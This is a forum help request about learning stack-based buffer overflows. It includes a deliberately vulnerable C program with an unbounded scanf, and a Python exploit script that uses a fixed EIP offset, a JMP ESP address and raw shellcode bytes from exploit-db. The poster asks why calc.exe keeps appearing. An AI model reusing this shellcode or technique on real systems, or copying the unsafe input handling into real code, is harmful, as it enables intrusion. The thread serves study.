Jump to content
Tuts 4 You

Shellcode Misbehaved


prasenjit

Recommended Posts

Hi all,

 

I am new to exploit development. When I was going to practice stack based buffer overflow by following the tutorial from:

 

https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/

 

I was tring to change the shellcode from popping up calc.exe to others. and i got success.

shellcode  1: http://www.exploit-db.com/exploits/28996/ [my best option]

shellcode 2: http://www.exploit-db.com/exploits/33836/

 

 

then i wrote a very simple program of string.

 

#include<stdio.h>

#include<conio.h>

int main()

{

char str[10];

printf("Enter you name:");

scanf("%s",str);

printf("Hello %s..",str);

getch();

return 0;

}

 

By the help of immunity debugger i found that after putting A for 28 times i got the EIP. then i write the exploit code with python:

shellcode used: http://www.exploit-db.com/exploits/28996/

OS: XP SP2

import win32com.client,time
shell = win32com.client.Dispatch("WScript.Shell")
shell.Run("text.exe")   # text.exe is that application
time.sleep(1)
 
junk = 'A' * 28
junk2 = '\xBC\xB7\xE5\x76'
shellcode = ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x69\x74"
"\x36\x01\x68\x73\x65\x6e\x6a\x68\x20\x50\x72\x61\x89\xe1\xfe"
"\x49\x0b\x31\xc0\x51\x50\xff\xd7")       

shell.SendKeys(junk+junk2+shellcode)
shell.SendKeys("{ENTER}")
shell.SendKeys("{ENTER}")
shell.SendKeys("{ENTER}")
 
#76E5B7BC   FFE4             JMP ESP

 

But the problem is whatever shellcodes i had used already gave me the calculator as output. I don't understand the reason. even i am not using shellcode for calc.exe so how it happens repeatedly. Please help me out guys.

Edited by prasenjit
Link to comment

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...